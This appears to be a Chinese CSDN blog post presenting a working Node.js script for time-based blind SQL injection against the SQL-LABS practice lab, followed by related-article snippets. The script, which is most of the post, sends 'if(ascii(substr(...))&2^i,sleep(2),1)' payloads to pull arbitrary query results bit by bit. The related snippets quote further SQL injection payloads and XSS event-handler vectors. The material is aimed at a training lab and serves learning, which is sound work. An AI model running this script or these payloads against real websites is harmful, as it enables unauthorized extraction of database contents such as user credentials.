SQL-LABS GET型基于时间盲注脚本(node)

最新推荐文章于 2024-08-05 17:39:02 发布
最新推荐文章于 2024-08-05 17:39:02 发布
阅读量695 收藏 1
点赞数
分类专栏: 学习 文章标签: SQL注入 node
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45146120/article/details/100565591
版权

原理

MYSQL 基于时间盲注详解

主要是通过将每个字符进行8次按位与运算,结果相加得到相应的ascii码值,进而得到对应的字符,通过此特性,构造Get请求,循环url,得到ascii码值,一个ascii码值需要执行8次按位与,只需要判断从发送请求到返回数据的耗时大于等于sleep函数的参数,则记录按位与得到的值,最后相加并转换得到一个字符,当转换的ascii码 = 0的时候,表示没有字符了,即可退出循环,并打印该字符,与布尔盲注脚本一样,只是基于时间盲注脚本需要计算发送请求到返回数据的耗时,执行过程中,按位与运算只要响应时间大于2000ms则会记录,每8次循环之后得到一个ascii码值,再转换为字符,最后拼接字符串,这个时间是非常久的

代码

const axios = require('axios')
const readline = require('readline')
const rl = readline.createInterface({
  input: process.stdin,
  output: process.stdout
})
async function timeInject(url) {
  const startTime = Date.now()
  return axios.get(url).then(data => {
    console.log('[+]payload: ' + url)
    const endTime = Date.now()
    if (endTime - startTime >= 2000) {
      return parseInt(url.match(/\%\d+/)[0].replace('%26', ''))
    } else {
      return 0
    }
  })
}
async function main() {
  console.log('[+] Please enter url')
  let url = await new Promise((resolve, reject) => {
    rl.on('line', url => {
      resolve(url)
    })
  })
  console.log('[+] Please enter SQL')
  const startTime = Date.now()
  const sql = await new Promise((resolve, reject) => {
    rl.on('line', sql => {
      resolve(sql)
      rl.close()
    })
  })
  let flag = true
  let index = 1
  let result = ''
  while (flag) {
    let sumAscii = 0
    for (let i = 0; i < 8; i++) {
      let str =
        url +
        `?id=1' and if(ascii(substr((${sql}),${index},1))%26${Math.pow(
          2,
          i
        )},sleep(2),1) --+`
      sumAscii += await timeInject(str)
    }
    if (sumAscii !== 0) {
      result += String.fromCharCode(sumAscii)
      ++index
    } else {
      flag = false
    }
  }
  const endTime = Date.now()
  console.log(
    '\n' +
      '[+]Injection Result: ' +
      sql +
      ' = ' +
      result +
      '\n' +
      '[+]Attck Time:' +
      (endTime - startTime) / 1000 +
      's'
  )
}
main()

结果

在这里插入图片描述

布尔盲注脚本一样,输入URL,SQL语句,一个字符执行8次按位与运算,只是按位与不为0的情况下会执行sleep函数,基于时间注入会开销时间,所以会时间会很长

Gundam-
关注
专栏目录
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
时间盲注脚本
weixin_55347427的博客
08-02 341
fafaffafa
SQL时间盲注
最新发布
2301_78549931的博客
08-05 1048
在注入时,information_schema库的作用就是获取 table_schema table_name, column_name .如果数据库名的第一个字符的ascii码值等于115,则页面沉睡3秒,如果数据库名的第一个字符的ascii码值不等于115,则页面不沉睡。这个库 就像时MYSQL的信息数据库,他保存着mysql 服务器所维护的所有其他的数据库信息, 包括了 库名,表名,列名。根据表名知道可能用户的账户和密码是在users表中,接下来我们就是得到该表下的字段名以及内容。
Python脚本-时间盲注
m0_74317362的博客
09-23 1122
添加了time.sleep(0.05)
时间盲注脚本(附带注释)
sGanYu
03-22 2816
参考python安全攻防时间盲注,自己修改了一些内容,加入了异常处理防止乱跑 # -*- coding: UTF-8 -*- import requests import time DBName = "" # 数据库名的变量 DBTables = [] DBColumns = [] DBData = {} requests.adapters.DEFAULT_RETRIES = 10 conn = requests.session() conn.keep_alive = False # 设置重连
sql-labs Time-based盲注脚本
lixiangminghate的专栏
07-14 1020
    sqli-labs lab9/lab10是基于时间盲注,如果完全用手动注入,费时费力。想到之前写过一篇基于布尔盲注的博文,于是我把当时脚本中的payload进行了修改,记录于此。    相比之前的脚本,替换了payload。另外,脚本记录了发送请求前的时间和响应返回的时间,比较时间差是否大于payload中设置的sleep时间(因为测试用的服务器就在本地虚拟机里,几乎不会有延迟,所以可以...
sqli-labs Less-8(布尔盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-11 579
布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利用页面的返回结果来得知判断语句是否正确。 再学习布尔盲注之前,一些常用函数如下: length(): 返回字符串长度。 substr(str, start, len): 截取str,从start开始,截取长度为len。 ascii(): 返回字符串的ascii码。 1、判断共有几个数据库 payload ?id=1' and (select count(schema_na
Sqli-labs(Page-1)1-22
ChenZIDu的博客
04-25 500
注入的sql一直想写来着的。之前数据库课偷懒的我,留下了悔恨的眼泪。。。(后面看着太烦了就没听了) Less-1 order by语句 order by(默认升序排列) 可以测试一下当前一共select了多少个字段 select * from user where username='1' ORDER BY 3 -- +' union 联合查询语句 union前后的两个sql语句的选择列数要相同...
SSJI - Node.js漏洞介绍
hackzkaq的博客
11-16 3072
一、SSJI简介 ssji,为服务器端的javascript注入,可分为sql注入和代码注入 运行于服务端的javascript常用的有node.js node.js 是运行于服务端的javascript 把javascript变为服务器端的脚本语言 二、SSJI代码注入 SSJI代码注入原理 SSJI 代码注入是一个存在于javascript端的代码注入,存在于运行于服务端的js代码注入,当传入的参数可控且没有过滤时,就会产生漏洞,攻击者可以利用js函数执行恶意js代码 SSJI代码注入常用函数 node
2021-最新Web前端经典面试试题及答案-史上最全前端面试题(含答案)---JavaScript篇
m0_54853146的博客
03-07 468
★★ 介绍一下JS的内置类有哪些? ★★★★ 介绍一下 typeof 区分类的原理 ★★★ 介绍一下类转换 ★★★★ 说说你对 JavaScript 的作用域的理解。什么是作用域链? ★★ 解释下 let 和 const 的块级作用域 ★★★★ 说说你对执行上下文的理解 ★★★ 对闭包的看法,为什么要用闭包?说一下闭包的原理以及应用场景?闭包的 this 指向问题? ★★★ 简述闭包的问题以及优化 ★★★ 如何确定 this 指向?改变 this 指向的方式有哪些? ★★★ 介绍箭头函数的 this
XSS总结:跨站脚本(XSS)攻击向量(精)
墨痕诉清风的博客
10-13 344
事件处理 不需要用户交互的事件处理程序 激活元素时触发(IE) <a id=x tabindex=1 onactivate=alert(1)></a> 页面打印后触发(Chrome、Firefox、IE) <body onafterprint=alert(1)> CSS动画取消时触发(Firefox) <style>@keyfra......
sql注入——时间盲注自动化注入脚本
栉风沐雪的博客
05-14 838
因为最近在学习sql注入,在学到时间盲注这里,发现注入的时候要从asc码33到127都查询一遍,手动注入工作量是在太大,想寻求是否存在什么简便方法,通过查询一些相关的书籍以及资料,将结果汇总如下。但这段代码仍存在很多不足,希望各位师傅指正。
基于时间盲注的python脚本
weixin_43460822的博客
10-07 2286
思路:重要的是构建payload,然后循环进行测试,通过对请求的时间进行判断payload是否正确,从而确定数据库的长度和数据库的名称. #encoding=utf-8 #时间盲注脚本 import requests import time import datetime #获取数据库长度 def database_len(): #存放跑出的结果 length=0 ...
时间盲注脚本——以sqli-labs第十关为例
weixin_52450702的博客
12-14 567
时间盲注脚本
SQL-LABS GET布尔盲注脚本(node)
AaronLuo
09-03 359
原理 基于SQL-LABS LESS-5,LESS-8 GET布尔注入,(布尔盲注详解),,基于MSQL 布尔盲注,主要是判断ascii码值是否与猜测的值相同,通过判断页面变化,确定ascii值 由于0-z的ascii值是48-122,256 = 2 ^ 0 + 2 ^ 1 + 2 ^ 2 + 2 ^ 3 + 2 ^ 4 +2 ^ 5 + 2 ^ 6 + 2^ 7 ,通过按位与运算8次,结果相加...
渗透测试之POC基于时间sql盲注
黑面狐
01-03 1790
这次写写基于时间sql盲注。 当整个页面没有地方显示数据的时候,这时候存在sql注入,我用md5()函数也没有地方响应出来。那么执行什么函数去证明存在注入呢?sleep()函数,页面执行了,sleep()函数后,从发请求到完全响应就有一个固定的延迟时间。 下面来看测试网站: 无论你ID=多少他都是  you are in ..... 基于时间盲注最常见的语句就是  If(asci
CTFHUB SQL注入——时间盲注 附自己写的脚本
wuuconix's blog
08-28 2596
介绍 时间盲注和上一篇布尔盲注一样都是盲注,都需要借助length,ascii,substr这些神奇的函数来猜测各项信息。它们的差别是猜测成功的依据。 布尔盲注的话如果查询有结果,一般会有一个success_flag,比如在上一题里就会返回query successfully。我的脚本也就是request返回值里有没有这个文本来判断是否查询成功的。 但是时间盲注不一样,它不光不给你查询的内容的回显,不给你报错信息,甚至连布尔盲注里的success_flag也不给你。也就是什么情况呢?你在那里查询,它什么信息
Python 安全开发 时间盲注脚本
YouthBelief的博客
10-26 1401
时间盲注0x00 时间盲注原理用到的函数有流程0x01脚本编写 (请求少,费时多)1.1用到的库1.2判断页面响应1.3判断返回字符串长度1.4 获取查询结果1.5 主函数0x02 脚本编写(请求多,费时少) 0x00 时间盲注原理 时间盲注应用于 页面 无论输入什么 页面显示 内容都一样, 可以用 ’ and sleep(5) --+ 发现 页面响应超过5秒 用到的函数有 sleep(5) 延时函数 延迟5秒 if($SQL,sleep(5),1) if函数 如果sql语句为真,执行sleep
SQLi LABS Less 9 时间盲注
热门推荐
wangyuxiang946的博客
06-22 1万+
SQLi 第九关,SQLi-LABS Less-9,SQLi-LABS Less 9,SQLiLABS Less9,SQLi Less 9
sqli-labs通用盲注脚本
06-14
Sqli-Labs是一套在线的SQL注入学习平台,它提供了许多实际的场景和挑战,包括通用盲注(Generic Blind SQL Injection)的练习。 通用盲注是指攻击者在不知道具体数据库结构的情况下,通过试探性的查询来获取服务器...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值